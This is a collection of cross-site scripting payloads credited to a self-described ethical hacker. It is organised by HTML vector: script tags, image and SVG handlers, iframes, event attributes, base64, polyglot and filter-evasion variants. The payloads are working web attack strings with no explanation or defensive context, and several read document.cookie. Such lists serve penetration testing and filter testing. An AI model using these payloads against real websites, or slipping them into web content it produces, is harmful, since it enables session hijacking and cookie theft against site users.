# ============================================
# Author: Tamilsevan S
# Role: Cybersecurity | Ethical Hacker | Red Hat  
# Website: https://tamilselvan-official.web.app/
# ============================================
# Advanced XSS Payloads Collection
# ============================================

## Basic XSS Payloads
<script>alert('XSS')</script>
<script>alert("XSS")</script>
<script>alert(1)</script>
<script>prompt('XSS')</script>
<script>confirm('XSS')</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
<script>alert(window.location)</script>

## Image Tag XSS
<img src=x onerror=alert('XSS')>
<img src="x" onerror="alert('XSS')">
<img src=1 onerror=alert(document.cookie)>
<img src=x onerror="alert(String.fromCharCode(88,83,83))">
<img src=x onerror="javascript:alert('XSS')">

## SVG XSS
<svg onload=alert('XSS')>
<svg onload="alert('XSS')">
<svg/onload=prompt(1)>
<svg onload="alert(String.fromCharCode(88,83,83))">
<svg><script xlink:href=data:,alert(1) />

## Body Tag XSS
<body onload=alert('XSS')>
<body onpageshow=alert('XSS')>
<body onscroll=alert('XSS')>
<body onresize=alert('XSS')>
<body onfocus=alert('XSS')>
<body onerror=alert('XSS')>

## Iframe XSS
<iframe src="javascript:alert('XSS')"></iframe>
<iframe src=javascript:alert('XSS')>
<iframe src="data:text/html,<script>alert('XSS')</script>">
<iframe onload=alert('XSS')>

## Input Tag XSS
<input type="text" onfocus="alert('XSS')" autofocus>
<input onblur=alert('XSS') autofocus>
<input onfocus=alert('XSS')>
<input type="image" src=x onerror=alert('XSS')>

## Form Tag XSS
<form action="javascript:alert('XSS')"><button>Submit</button></form>
<form onsubmit=alert('XSS')><button>Submit</button></form>

## Link/Anchor XSS
<a href="javascript:alert('XSS')">Click</a>
<a href="data:text/html,<script>alert('XSS')</script>">Click</a>
<a onmouseover=alert('XSS')>Hover</a>
<a onfocus=alert('XSS') autofocus>Focus</a>

## Video/Audio XSS
<video onerror=alert('XSS')><source src=x></video>
<video onloadstart=alert('XSS')><source src=x></video>
<audio onerror=alert('XSS')><source src=x></audio>
<video oncanplay=alert('XSS')><source src=x></video>

## Object/Embed XSS
<object data="javascript:alert('XSS')"></object>
<embed src="javascript:alert('XSS')">
<object onerror=alert('XSS')></object>

## Style/CSS XSS
<style>@import "javascript:alert('XSS')";</style>
<style>body{background-image:url("javascript:alert('XSS')")}</style>
<link rel="stylesheet" href="javascript:alert('XSS')">

## Table Tags XSS
<table background="javascript:alert('XSS')"></table>
<td background="javascript:alert('XSS')">
<th background="javascript:alert('XSS')">

## Other HTML Tags XSS
<marquee onstart=alert('XSS')>XSS</marquee>
<marquee onfinish=alert('XSS') loop=1>XSS</marquee>
<marquee onbounce=alert('XSS')>XSS</marquee>
<isindex type=image src=1 onerror=alert('XSS')>
<isindex action=javascript:alert('XSS') type=submit>

## Meta Tag XSS
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">
<meta charset="x-mac-farsi">&#1738;&#1810;&#1738;&#1803;&#1738;&#1803;&#1738;&#1809;&#1738;&#1810;&#1749;&#8234;&#8234;&#8234;

## Script Tag Variations
<script>alert`XSS`</script>
<script>\u0061\u006c\u0065\u0072\u0074('XSS')</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

## Base64 Encoded XSS
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="></iframe>
<img src="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+">

## Polyglot XSS
<script>alert('XSS')//</script>
<script>/*'//--></noscript></title></textarea></script><svg onload=alert('XSS')>
<script>alert('XSS')</script>">'><script>alert('XSS')</script>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

## DOM Based XSS
#<img src=/ onerror=alert('XSS')>
#<img src=/ onerror="javascript:alert('XSS')">
#<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))>

## XSS via Event Handlers
onmouseover=alert('XSS')
onclick=alert('XSS')
onload=alert('XSS')
onerror=alert('XSS')
onchange=alert('XSS')
onsubmit=alert('XSS')
onfocus=alert('XSS')
onblur=alert('XSS')
onkeydown=alert('XSS')
onkeypress=alert('XSS')
onkeyup=alert('XSS')
onmousedown=alert('XSS')
onmouseup=alert('XSS')
onmousemove=alert('XSS')
onmouseout=alert('XSS')
onmousewheel=alert('XSS')
onscroll=alert('XSS')

## XSS with HTML Entities
&lt;script&gt;alert('XSS')&lt;/script&gt;
&#60;script&#62;alert('XSS')&#60;/script&#62;
&#x3c;script&#x3e;alert('XSS')&#x3c;/script&#x3e;
<scr%00ipt>alert('XSS')</scr%00ipt>
<scr<script>ipt>alert('XSS')</scr</script>ipt>
